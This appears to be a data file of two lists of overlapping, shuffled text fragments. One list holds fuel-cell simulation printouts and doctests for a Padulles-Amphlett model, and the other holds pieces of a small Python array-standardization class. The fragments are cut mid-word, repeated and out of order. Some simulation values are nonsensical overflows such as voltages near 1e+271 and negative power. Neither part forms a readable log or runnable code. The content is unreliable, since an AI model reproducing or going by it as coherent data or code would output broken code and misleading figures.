"Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V", "atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0", "W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514", "Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419", "FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396", "3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration :", "PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal", "6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta", "0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326", "V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage :", "0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729", "Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta", "6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta", "Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418", "0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I :", ": 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC", "0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power", "0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347", "V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency", "atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4", ": 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal :", ": 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2", "Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W", "0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063", "0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385", "Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O", "Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288", ": 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal :", "0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration :", "3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786", "Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V", "0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169", "PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E", ": 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E :", "0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154", ": 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal :", "atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V", "Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564", "FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm", "0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013", "E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795", ": 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta Activation", "4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142", "Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V", "V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm", ": 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal :", "0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I :", ": 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 :", "Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta", ": 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2", "Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5,", ": -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss", ": 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2", "FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446", "PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E", "Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta", ": 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E :", "PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E", "########### I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V", "FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525", "E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05", ": 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V", "0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408", ": -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O :", "2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta Activation :", "V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm", "I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta", "########### I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V", ": 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V", "atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V", "Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O", "Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354", ": 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation", "Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V", "V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm", "atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V", ": 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E :", "FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm", "V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic", "6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta", ": 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration", ": 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration", "3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration :", "########### I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V", "V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm", "FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658", "W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537", ": 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss", "V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm", "atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3", "Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V", "FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963", "V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic", "W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097", "V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage :", ": 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O :", "########### I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V", "0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575", "0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power", "3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 :", "0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576", "2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta Activation :", ": 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 :", "0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage", "V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic", "Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V", ": 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal :", ": 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E :", "Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258", "Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V", "PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal", "V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm", "atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V", "########### I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V", ": 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E :", "Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W", "W ########### I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657", "atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating", "1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power", "Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538", "Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W", "Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V", "PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E", "5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta Activation :", "0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage", "########### I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V", "atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W", "Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114", ": 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E :", ": 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss", "0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power", "0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819", "6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta", ": 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done!", "0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage", "I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta", "6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta", "W ########### I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225", "0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269", "0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss :", "Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V", "V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic", "0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923", "V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency", "V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power :", ": 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V", "3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta Activation :", ": 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O :", "FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm", "0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047", "PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal", "atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W", ": 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2", "0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC", "Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111", "4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136", "V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm", ": 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V", "V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power :", "0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power", ": 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta Activation", "3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765", "0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power", "0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss :", ". . I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243", "V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power :", "V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage :", ": 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss", "I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta", "V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm", "W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839", "Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665", "6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta", "2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration :", "0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I :", "Report is generating ... Warning : The value of I(>0.1) leads to minus", "4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458", "W ########### I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017", ": 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V", ": 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal :", "Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397", "Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928", ": 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss", "3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935", ": 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E :", "Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2", "V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency", "5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925", "V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage :", ": 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2", ": 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V", "Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V", "0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I :", ": 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I", "Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575", ": 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC", ": 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration", ": 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration", "0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836", ": 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 :", "0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss :", "0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC", "FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm", "V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic", "V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency", "Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461", "1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration :", "4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979", "V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage :", "V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage :", "Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592", "Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency :", "FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573", "V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm", "FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm", ": 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O :", "Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5]", ": 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V", ": 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss", "Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic :", "Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398", ": 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration", "0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895", "Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2", "Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V", ": 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal :", "Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O", "Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta", "I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta", "0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142", "0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272", "Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic :", "0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182", "V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm", "Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency :", "Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>>", ". I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V", "Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277", "0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta Activation :", "Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta", "V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm", ": 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E :", "0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power", "V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage :", "FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268", "0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339", "atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5", "V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm", "PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal", "V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm", "Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V", ">>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>>", ": 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta Activation", "6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta", "PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E", "FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm", "atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V", "atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6", "0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208", "Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic :", "FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361", "V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm", "Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O", "Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O", "atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating", "0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993", "FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483", "Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta", ": 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal :" ]
[ ":param MLLD_functions: this class has several functions that are usually used by myself.", "\"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i in", "for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std new_variable.append(new_variable_i) self.new_variable = np.array(new_variable)", ":param variable: the array with the variables you wish to standardize :return: standardized", "standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for", "= np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i", "the variables you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable)", "as np \"\"\" :param MLLD_functions: this class has several functions that are usually", "several functions that are usually used by myself. \"\"\" class MLLD_functions: def standardization(self,", "wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std = np.std(variable)", "are usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param", "usually used by myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable:", "def standardization(self, variable): \"\"\" :param variable: the array with the variables you wish", "variables you wish to standardize :return: standardized array \"\"\" var_average = np.average(variable) var_std", "\"\"\" :param MLLD_functions: this class has several functions that are usually used by", "this class has several functions that are usually used by myself. \"\"\" class", "var_average = np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size):", "class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with the variables", "np.average(variable) var_std = np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i =", "np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] - var_average)/var_std", "= np.std(variable) new_variable = [] for i in range(variable.size): new_variable_i = (variable[i] -", "myself. \"\"\" class MLLD_functions: def standardization(self, variable): \"\"\" :param variable: the array with", "\"\"\" :param variable: the array with the variables you wish to standardize :return:", "numpy as np \"\"\" :param MLLD_functions: this class has several functions that are", "standardization(self, variable): \"\"\" :param variable: the array with the variables you wish 